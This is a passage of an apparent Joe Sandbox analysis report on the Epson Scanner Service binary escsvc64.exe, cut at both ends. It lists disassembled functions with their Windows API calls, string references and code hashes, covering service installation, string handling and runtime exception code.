EpsonScanSvc, xrefs: 0000000140001086
/INSTALL, xrefs: 0000000140001103

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CommandLine$ArgvCtrlDispatcherErrorFreeLastLocalServiceStart
String ID: /INSTALL$/REMOVE$/START$EpsonScanSvc
API String ID: 3066385700-2890983393
Opcode ID: 892e3ca7ef4c69f471d0857e3ba10fac6c3007216d9c59a3f38b029a3d16826f
Instruction ID: 00e7215b831508a1bfd6c78f70e2d71afd0ea9bd53dfdf506a60f8cf801ecc08
Opcode Fuzzy Hash: 892e3ca7ef4c69f471d0857e3ba10fac6c3007216d9c59a3f38b029a3d16826f
Instruction Fuzzy Hash: BB4137B161460182FBA7DF26F8003D522A6B78DBD4F450115FB4D4B2B5EB7DC6858B00

Function 000000014000C460 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

ProgramFiles(x86), xrefs: 000000014000C46A

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: ProgramFiles(x86)
API String ID: 0-3631460872
Opcode ID: 5aa0113af64dece72855306ed5142673a163ac40d65c4e8cb90546828406792a
Instruction ID: 9127b6108a6fe4907f51ecd6b6fda9542d2f4e0bc3f7902fd2aa62e221dadbe8
Opcode Fuzzy Hash: 5aa0113af64dece72855306ed5142673a163ac40d65c4e8cb90546828406792a
Instruction Fuzzy Hash: AED1B0B2226B4046FB66DF23B940B9A22D5BB4CBD4F544628BF59877F5EF39C4508304

Function 0000000140001620 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 0000000140001646
OpenSCManagerW.ADVAPI32 ref: 0000000140001666
CreateServiceW.ADVAPI32 ref: 00000001400016C8
CloseServiceHandle.ADVAPI32 ref: 00000001400016D6
CloseServiceHandle.ADVAPI32 ref: 00000001400016DF

Strings

Epson Scanner Service, xrefs: 0000000140001676
EpsonScanSvc, xrefs: 000000014000167D

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Service$CloseHandle$CreateFileManagerModuleNameOpen
String ID: Epson Scanner Service$EpsonScanSvc
API String ID: 3731051440-3749567872
Opcode ID: e44dd253997b3ef5f0b967754aed42a884e41eef0cd5d29b8ab8123e2fea21ee
Instruction ID: d12736527c6ebb1e8ae89aa99a5e8e9019ee518063c7dab1828002a18af76718
Opcode Fuzzy Hash: e44dd253997b3ef5f0b967754aed42a884e41eef0cd5d29b8ab8123e2fea21ee
Instruction Fuzzy Hash: 08110D75219B8086EBA29F12F84439A73E0F78C784F440129AB8E4BB65DF7EC159CB04

Function 000000014000B7C0 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B82C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B83C
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B8AF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B918
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B9D0
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B9F3

Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1

LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000BA98
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000BB18

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: 20432cab36c6dbed515a262eca0b50abff2ace2c6339518cb4822e9a9266b7e2
Instruction ID: 9c8700ab1141e435e72936b5364478f7a3f5ef711e1f984da879f0f746b14839
Opcode Fuzzy Hash: 20432cab36c6dbed515a262eca0b50abff2ace2c6339518cb4822e9a9266b7e2
Instruction Fuzzy Hash: 97A17CB26046808AEB66DF27A8407AA77E5F74CBE8F444615FF69477F8DBB4C9008700

Function 000000014000BE40 Relevance: 12.3, APIs: 8, Instructions: 255COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BEB1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BEC7
CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BF65
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BFCD
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C074
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C0A1
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C144
CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C164

Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString$AllocErrorHeapLast
String ID:
API String ID: 2358816652-0
Opcode ID: e9b1fc539188ae227e023a621f6c880a74b02bd8cd22f073dc7325617dabf5e2
Instruction ID: 25766cdb4171dd0df19f2a8dc6186ae233e1c77f8feca8f3f56186a2c2c33a88
Opcode Fuzzy Hash: e9b1fc539188ae227e023a621f6c880a74b02bd8cd22f073dc7325617dabf5e2
Instruction Fuzzy Hash: 6CA18DB221068186EB66CF27A840BEA76E5F74CBE4F044325BF69477F5DB78C9108600

Function 0000000140002BE0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140004D93
RtlLookupFunctionEntry.KERNEL32 ref: 0000000140004DB2
RtlVirtualUnwind.KERNEL32 ref: 0000000140004DFE
IsDebuggerPresent.KERNEL32 ref: 0000000140004E70
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004E88
UnhandledExceptionFilter.KERNEL32 ref: 0000000140004E95
GetCurrentProcess.KERNEL32 ref: 0000000140004EAE
TerminateProcess.KERNEL32 ref: 0000000140004EBC

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: a993e17622dc4e08d11cadeb5874a037e5c983861ee5d26290c3c4bdfb062f94
Instruction ID: 0a53ef63b1186bbb18e64a066530ac40fa3c2432616e5a8d49a3086d2c49944c
Opcode Fuzzy Hash: a993e17622dc4e08d11cadeb5874a037e5c983861ee5d26290c3c4bdfb062f94
Instruction Fuzzy Hash: 6031B275105B8095EB529B66F84039A77A5F7887D4F90002AFB8D4BBB9DF7EC488C700

Function 00000001400024A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117sleepcomCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00000001400024A9

Part of subcall function 0000000140002300: OpenProcess.KERNEL32 ref: 00000001400023C7
Part of subcall function 0000000140002300: EnumProcessModules.PSAPI ref: 00000001400023E8
Part of subcall function 0000000140002300: GetModuleBaseNameW.PSAPI ref: 0000000140002407
Part of subcall function 0000000140002300: lstrcmpiW.KERNEL32 ref: 000000014000241F
Part of subcall function 0000000140002300: WaitForSingleObject.KERNEL32 ref: 0000000140002431
Part of subcall function 0000000140002300: CloseHandle.KERNEL32 ref: 0000000140002441

CoInitialize.OLE32 ref: 00000001400024C2
CoCreateInstance.OLE32 ref: 00000001400024FF
Sleep.KERNEL32 ref: 000000014000261A
CoUninitialize.OLE32 ref: 0000000140002646

Strings

EsDevApp.exe, xrefs: 00000001400024AF

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ProcessSleep$BaseCloseCreateEnumHandleInitializeInstanceModuleModulesNameObjectOpenSingleUninitializeWaitlstrcmpi
String ID: EsDevApp.exe
API String ID: 3981737800-2601315703
Opcode ID: daf108ad2492d59e3b2f479c2d6f66dd4c153266607f82eb38b2f9320bf23656
Instruction ID: 4c1571d9f6e7ad7ab6dcd9acc25b38c42de4195439161a2ccdbef4236d1c33e3
Opcode Fuzzy Hash: daf108ad2492d59e3b2f479c2d6f66dd4c153266607f82eb38b2f9320bf23656
Instruction Fuzzy Hash: FD51F872704B85C7EB41DF6AE48039AB7A4F788B84F544016EB8A87B78DF3AC404CB00

Function 0000000140004AE0 Relevance: 9.1, APIs: 6, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140005F50: FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70

RtlCaptureContext.KERNEL32 ref: 0000000140004B46
IsDebuggerPresent.KERNEL32 ref: 0000000140004B8A
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004B94
UnhandledExceptionFilter.KERNEL32 ref: 0000000140004B9F
GetCurrentProcess.KERNEL32 ref: 0000000140004BB5
TerminateProcess.KERNEL32 ref: 0000000140004BC3

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminateValue
String ID:
API String ID: 2638224479-0
Opcode ID: fe3b404e39ab3a6359d64812ae7d5c32bbc6d9cca1fe9c7ac87858ea7d466bcd
Instruction ID: a5a9b1898e11e2f70964af4ed3ba5651a8fd56e4f95061c9445462abb668a243
Opcode Fuzzy Hash: fe3b404e39ab3a6359d64812ae7d5c32bbc6d9cca1fe9c7ac87858ea7d466bcd
Instruction Fuzzy Hash: C1214A71208B8096EB61DB52F84439AB3A4F79DBC4F844025FB8A47B69DF7DC504CB00

Function 0000000140004A40 Relevance: 9.0, APIs: 6, Instructions: 34COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140004A51
IsDebuggerPresent.KERNEL32 ref: 0000000140004A95
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004A9F
UnhandledExceptionFilter.KERNEL32 ref: 0000000140004AAA
GetCurrentProcess.KERNEL32 ref: 0000000140004AC0
TerminateProcess.KERNEL32 ref: 0000000140004ACE

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 749ad101a7401e2ef89ee7f69644ff702e9b097609237a3113f26607bece523b
Instruction ID: 547e43dbe8d46964c1980a3d338b47eb6a37bf82025ef3a4bc6307ca307c5f97
Opcode Fuzzy Hash: 749ad101a7401e2ef89ee7f69644ff702e9b097609237a3113f26607bece523b
Instruction Fuzzy Hash: 18010C71318A8196EB62DB62F88439A73A4FB9D785F400125BBCE47675EF7DC108CB14

Function 0000000140008860 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000889F
GetCurrentProcessId.KERNEL32 ref: 00000001400088AA
GetCurrentThreadId.KERNEL32 ref: 00000001400088B6
GetTickCount.KERNEL32 ref: 00000001400088C2
QueryPerformanceCounter.KERNEL32 ref: 00000001400088D3

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 3172a890c2690bad93ebacd8f31485773cebedccae4a3836e7c267b263b6fc39
Instruction ID: c8f5c1707d9d7f31180c01c804354bd43dcd32a39dbeb025c98923512ad50797
Opcode Fuzzy Hash: 3172a890c2690bad93ebacd8f31485773cebedccae4a3836e7c267b263b6fc39
Instruction Fuzzy Hash: 51015B31255A4086EB929F22F9443856360F74DBD1F846220FF9E4B7B4DA7DC8858700

Function 01FD14F8 Relevance: 5.1, APIs: 3, Instructions: 577COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 01FD17B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 01FD1AD4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 01FD1ADA

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 271df34881ef90a6752aab6aa872fdf107a8abbdb8059afa06a903151e2ecbe1
Instruction ID: 7c3c3718b358824f65eb63e5c1f25ea472f3b7de15e434af7a04745efe68e98b
Opcode Fuzzy Hash: 271df34881ef90a6752aab6aa872fdf107a8abbdb8059afa06a903151e2ecbe1
Instruction Fuzzy Hash: E9029730A1CA088FEB14EF28D8896AE77E2FB98315F54861DE54BD31A0DF75D941CB81

Function 00000001800015D0 Relevance: 5.1, APIs: 3, Instructions: 577COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180001889
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180001BAC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180001BB2

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 3294e3db836000f6d2449f15fb682ad65810c8515660842441d03c4222b8b57f
Instruction ID: 3e174ebd0b4dc535322bba8940045b5d3b3c6cc8a60d76115f1a3040dc0f23b8
Opcode Fuzzy Hash: 3294e3db836000f6d2449f15fb682ad65810c8515660842441d03c4222b8b57f
Instruction Fuzzy Hash: 0E027230618A0C8FEB95EF28D8897EE77E1FB9C355F108619F44AC31A1DF749A458B81

Function 000000014000E7D0 Relevance: 4.5, APIs: 3, Instructions: 47COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000014000E80F
SetUnhandledExceptionFilter.KERNEL32 ref: 000000014000E855
UnhandledExceptionFilter.KERNEL32 ref: 000000014000E860

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 2bd1da81d756f9debfc8ace423c26fb13e72461904f7d13b3772817e52c697b7
Instruction ID: f8d1cc87438c59eaa9310dd9af8894f5bfa89bfe72cd1caa951d1f775a9d3454
Opcode Fuzzy Hash: 2bd1da81d756f9debfc8ace423c26fb13e72461904f7d13b3772817e52c697b7
Instruction Fuzzy Hash: CC015A71219AC492F766DB26F4557EA63A0EB8D384F000129BB8E076F6DF3DC508CB01

Function 0000000140005390 Relevance: 3.3, APIs: 2, Instructions: 252COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140005280: GetOEMCP.KERNEL32 ref: 0000000140005320

IsValidCodePage.KERNEL32 ref: 0000000140005493
GetCPInfo.KERNEL32 ref: 00000001400054A8

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 746918d43814e1f2c9af94b4a9972c42ccf04353f898198fd0c53df7ebd173c8
Instruction ID: 18e61400bb96301bbec93746a76fb9060afdb4b0dd8a3b5c59150d0e33468df6
Opcode Fuzzy Hash: 746918d43814e1f2c9af94b4a9972c42ccf04353f898198fd0c53df7ebd173c8
Instruction Fuzzy Hash: 33A12BF3A0478086E756EF36E4143BE7BA1F70AB8AF98801AE7454B3A5DB39C544D710

Function 000000014000DCB0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000000014000DEA2
GetLastError.KERNEL32 ref: 000000014000DECD

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: b65bf8a35cb6acb9d5dcae940683951546b7911799428669d5f49dfc0d45bba3
Instruction ID: 4df4f4bd984c48344e5120aa612abb9bb394b705a9150be4478bdb323d17f3df
Opcode Fuzzy Hash: b65bf8a35cb6acb9d5dcae940683951546b7911799428669d5f49dfc0d45bba3
Instruction Fuzzy Hash: D271C0B2605A8186F7A7EF16F5117EA73A0F7897D4F148126FF890B7A5DB388441C720

Function 000000014000EA40 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8b9bd707a4bded7346095c377bb72f702d82cdc3ba41d96247cdce7536106d
Instruction ID: a108be8453ac259458a964569c12a7956ece8339cf63da49095956afe38e5b46
Opcode Fuzzy Hash: 5f8b9bd707a4bded7346095c377bb72f702d82cdc3ba41d96247cdce7536106d
Instruction Fuzzy Hash: 6A31BDB261069042F727EF37B9957DF7691ABC97E0F254628BB26076F2CB78C4008714

Function 0000000140003FEC Relevance: 1.5, Strings: 1, Instructions: 295COMMON

Download Yara Rule

Strings

, xrefs: 0000000140004594

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 32495c8dccd9f3046cba6630eed02d8ddada8e30325001f32572ff2cb2464c48
Instruction ID: 9b98e272f23b31000e522342938d738987bd4303e8b55c05a30ad8263886681a
Opcode Fuzzy Hash: 32495c8dccd9f3046cba6630eed02d8ddada8e30325001f32572ff2cb2464c48
Instruction Fuzzy Hash: 1CD103F290878486F762DF16B5043AE7AA0F74A7D4F204115FF95076EAEB7AC840DB48

Function 000000014000DF90 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000DFB8

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 9c474ab35380cca253cccae0723cdccddec738a87e399c508cee6c96ab130aff
Instruction ID: 6361ff8ef294167b234341539ef2ad75469b6cb2daf03c0979b493034d4b5b00
Opcode Fuzzy Hash: 9c474ab35380cca253cccae0723cdccddec738a87e399c508cee6c96ab130aff
Instruction Fuzzy Hash: A1F0FEB161858081FA62EB22E8623DA7791A79C7D9FC00615FB9D5B6B5DA7CC2058A00

Function 000000014000438B Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 81c1d04c05283fd2a1325daf2c7e4ba4b4c701fcda75abe4fb00a0c260c9d664
Instruction ID: 203bb844dbd7e1f4b5331dfdd11ea529bf7a11c02d688668fadee304e6c52705
